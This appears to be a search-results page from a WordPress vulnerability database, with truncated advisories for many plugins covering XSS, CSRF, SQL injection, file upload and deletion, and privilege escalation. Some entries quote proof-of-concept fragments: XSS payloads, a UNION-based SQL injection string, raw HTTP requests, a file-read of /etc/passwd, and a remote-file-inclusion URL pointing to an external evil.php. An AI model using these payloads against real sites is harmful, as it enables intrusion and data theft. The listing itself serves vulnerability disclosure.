4359 matches found
Ninja Tables < 4.1.8 - Admin+ Stored Cross-Site Cross-Site Scripting
The plugin does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Create a table, add a column with the following payload " as Name, then add data with the followin...
Perfect Survey < 1.5.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape multiple parameters id and filterssessionid of singlestatistics page, type and message of importexport page before outputting them back in pages/attributes in the admin dashboard, leading to Reflected Cross-Site Scripting issues...
Final Tiles Gallery < 3.4.19 - Authenticated Stored Cross-Site Scripting (XSS)
Multiple cross-site scripting vulnerabilities in Final Tiles Gallery 3.4.18 and lower allow remote attackers to inject arbitrary web script or HTML via the Title and Caption fields of an image. Successful exploitation of this vulnerability would allow an authenticated high-privileged user author+...
TownHub < 1.0.6 - Multiple Vulnerabilities
Multiple vulnerabilities was discovered in the 'TownHub - Directory & Listing WordPress Theme', tested version — v1.0.2: - Unauthenticated XSS - Authenticated Persistent XSS - IDOR Edit WPScanTeam: December 27h, 2019 - Envato Contacted January 5th, 2020 - Envato Investigating January 6th, 2020 -...
Quick Adsense < 2.8.2 - Subscriber+ Post Stats Reset
The plugin does not have authorisation and CSRF checks in some of its AJAX actions allowing any authenticated users, such as subscribers to call them and reset Posts stats for example fetch"/wp-admin/admin-ajax.php", "headers": "accept": "/", "accept-language": "en-US,en;q=0.9", "content-type":...
DW Question & Answer Pro <= 1.3.4 - Multiple CSRF
The plugin does not properly check for CSRF in some of its functions, allowing attackers to make logged in users perform unwanted actions, such as update a comment or a question status. Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified...
WP Dependency Installer < 4.3.1 - Subscriber+ Arbitrary Plugin Activation
The wp-dependency-installer library, used in the plugins does not have authorisation and CSRF checks in its dependencyinstaller AJAX action with the activate method, allowing any authenticated users, such as subscriber to activate arbitrary plugin installed on the blog. Furthermore, despite havin...
MOLIE <= 0.5 - Reflected Cross-Site Scripting
The plugin does not escape the courseid parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=moliecoursecheck&courseid=alert/XSS/...
EditableTable <= 0.1.4 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape any of the Table and Column fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Create a new EDTB and put the following payload in the Table Name, Column Name or Column...
Leads-5050 Visitor Insights < 1.0.4 - Unauthenticated License Change
The leads5050setlicense AJAX action was available to unauthenticated users allowing them to set an arbitrary license in the plugins settings POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip,...
Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: URL Content-Length: 774 Accept: / X-Requested-With: XMLHttpRequest User-Agent:...
Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF
Description The Avada WordPress theme was affected by a Stored Cross-Site Scripting XSS & CSRF security vulnerability. http://cdn.wphutte.com/Avada/5.1.4/xss.html http://cdn.wphutte.com/Avada/5.1.4/csrf.html...
WP125 < 1.5.5 - Arbitrary Ad Deletion via CSRF
The plugin does not have CSRF checks in various action, for example when deleting an ad, allowing attackers to make a logged in admin delete them via a CSRF attack https://example.com/wp-admin/admin.php?page=wp125addedit&deletead=1...
LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS
The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoint could be used to set CSS code if a setting is enabled, which will then ...
Support Board < 3.3.6 - Arbitrary File Deletion via CSRF
The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files...
DiveBook <= 1.1.4 - Unauthenticated Reflected XSS
:A reflected Cross-Site Scripting vulnerability exists within the DiveBook log's filter functionality. Arbitrary URL parameters are reflected into the application's response, rendered by the browser as HTML or JavaScript. An attacker may abuse this functionality by sending a victim a crafted link...
HyperComments <= 1.2.2 - Unauthenticated Arbitrary File Deletion
The plugin does not validate and sanitise user input which is being concatenated to create a file path, passed to unlink, which leads to an arbitrary file deletion issue. For more details about this issue, please see the reference. File: hypercomments/hypercomments.php:112 $filename =...
Download Monitor < 4.5.91 - Admin+ Arbitrary File Download
The plugin does not ensure that files to be downloaded are inside the blog folders, and not sensitive, allowing high privilege users such as admin to download the wp-config.php or /etc/passwd even in an hardened environment or multisite setup. Create a new download, add a file and put the followi...
Shortcode Addons < 3.1.0 - Unauthenticated Arbitrary Option Update
The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options. POST /wp-json/ShortCodeAddonsUltimate/v2/addonssettings HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate...
Typebot < 1.4.3 - Admin+ Stored Cross Site Scripting
The plugin does not sanitise and escape the Publish ID setting, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Put the following payload in the 'Publish ID or Full URL" setting and save: "...
Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update
The plugin does not have proper authorisation nor CSRF checks in the saveglobalsetting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue which wi...
Payment Form For Paypal Pro < 1.1.65 - Unauthenticated SQL Injection
The 'query' parameter allowed for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. https://example.com/?cffaction=getdatafromdatabase&query=SELECT%20%20from%20wpposts...
3DPrint < 3.5.6.9 - CSRF to arbitrary file downlad
Description The plugin does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will create an archive of any files or directories on the target server by tricking a logged in admin into...
Kunze Law < 2.1 - Admin+ Stored Cross-Site Scripting
The plugin does not escape its 'E-Mail Error "From" Address' settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in the 'E-Mail Error "From" Address' settings of the plugin:...
CorreosExpress <= 2.6.0 - Sensitive Information Disclosure
The plugin generates log files which are publicly accessible, and contain sensitive information such as sender/receiver names, phone numbers, physical and email addresses https://example.com/wp-content/plugins/correos-express/log/logcronfunction.txt...
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Roles
Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges. $username, 'firstname-'. $formid =...
Official MailerLite Sign Up Forms < 1.4.4 - Unauthenticated SQL Injection
Most methods in the MailerLite plugin do not sanitize user input data which causes SQL injection. Also no single method checks for a nonce token which causes a CSRF issue everywhere. One example would be to inject the payload 1 union all select database,2,3,1,5 into the formid GET parameter of th...
Forym <= 1.5.8 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting On a blog having the plugin and the Search Forum Widget active, append the following parameter: ?s="...
10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)
The plugin was affected by a reflected Cross-Site Scripting XSS vulnerability in the wdiapplychanges admin page, allowing an attacker to perform such attack against any logged in users...
Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its Duplicate Title and Slug settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in the "Duplicate Title" or "Duplicate Slug"...
GRAND FlaGallery <= 6.1.2 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of its gallery settings, which could allow high privilege users to perform Cross-Site scripting attacks even when the unfilteredhtml capability is disallowed. Create/edit a gallery and put the following payload in the "Back Button Text" setting, then...
Speed Booster Pack < 4.3.3.1 - Admin+ SQL Injection
The plugin does not escape the sbpconverttablename parameter before using it in a SQL statement to convert the related table, leading to an SQL injection https://example.com/wp-admin/admin-ajax.php?action=sbpdatabaseaction&sbpaction=converttables&sbpconverttablename=SQLi&nonce=b2d6208254 The nonc...
Content Egg < 5.3.1 - Reflected Cross-Site Scripting
The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting https://example.com/wp-admin/admin.php?page=content-egg-autoblog-edit&a"alert/XSS/...
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Windows NT 6.1...
Easy Social Icons < 3.2.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its saved settings before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks when the unfilteredhtml capability is disallowed. 3.1.3 added some escaping, but data was output elsewhere Put the...
Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the REQUESTURI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert/XSS/%3E/?debug=true...
HTML5 Responsive FAQ <= 2.8.5 - Admin+ Stored Cross-Site Scripting
The plugin does not properly sanitise and escape some of its settings, which could allow a high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml is disallowed Put the following payload in the "Text size of answer in pixels" settings: alert'XSS'; The XSS will be...
Booking Calendar < 8.9.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the bookingtype parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting https://example.com/wp-admin/admin.php?page=wpbc&bookingtype=%22%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E%3Cscript%3E%2F%2A...
Stars Rating < 3.5.1 - Comments Denial of Service
The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the comments section, or pending comment dashboard depending if the user sent it as unauthenticated or authenticated. Enable rating for a post/page, add a comment, capture the...
Modal Window < 5.2.2 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
Modal Survey < 2.0.1.8.2 - Authenticated PHP Object Injection
The Unserialize function is used multiple times in the code, for example when importing custom surveys. This could allow a malicious administrator to import a crafted JSON to trigger a PHP Object Injection vulnerability "name":"Open Text Answer Sample", "id":"924478511", "options":"", "global":"0...
Age Gate < 2.13.5 - Unauthenticated Open Redirect
The plugin takes the wphttpreferer parameter to redirect users after some actions as well as after invalid or missing nonces, leading to an Unauthenticated Open Redirect issue...
Autoptimize < 2.7.8 - Arbitrary File Upload via "Import Settings"
The plugin attempts to delete malicious files such as .php form the uploaded archive via the "Import Settings" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not remove...
Booked < 2.2.6 - Broken Authentication to Export Users Data in CSV
The plugin allows users to Book Appointment by providing their PII such as Email, Name, Phone Number and Personal Message. The vulnerability allows anyone to Dump all records of users and their appointment details in CSV as an unauthenticated user. The user also gets registered as a WP User after...
DW Question & Answer Pro <= 1.3.4 - Arbitrary Comment Edition via IDOR
The plugin does not check that the comment to edit belongs to the user making the request, allowing any user to edit other comments. Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified numerous times since. As any authenticated user, post a...
IDPay for Contact Form 7 <= 2.1.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the idpayerror parameter before outputting it back in the page leading to a Reflected Cross-Site Scripting Append the following payload on a page where a form with an idPay payment interface is embed: &idpayerror=alert/XSS/ Example:...
Ad Invalid Click Protector (AICP) < 1.2.7 - Reflected Cross-Site Scripting
The plugin does not have sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected cross-Site Scripting alert/XSS/' /...
Shopping Cart & eCommerce Store < 5.2.5 - Arbitrary Design Settings Update via CSRF
The plugin is lacking CSRF checks in various AJAX actions, such as ecadminajaxsavedesignsettings, which could allow attackers to make a logged in admin update arbitrary settings To disable the Live Design Editor To set the custom CSS setting to body background-color: red;...
PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise
The plugin does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any...
Page View Counts < 2.4.9 - Contributor+ Stored XSS
The plugin does not escape the postid parameter of pvcstats shortcode, allowing users with a role as low as Contributor to perform Stored XSS attacks. A post made by a contributor would still have to be approved by an admin to have the XSS triggered in the frontend, however, higher privilege user...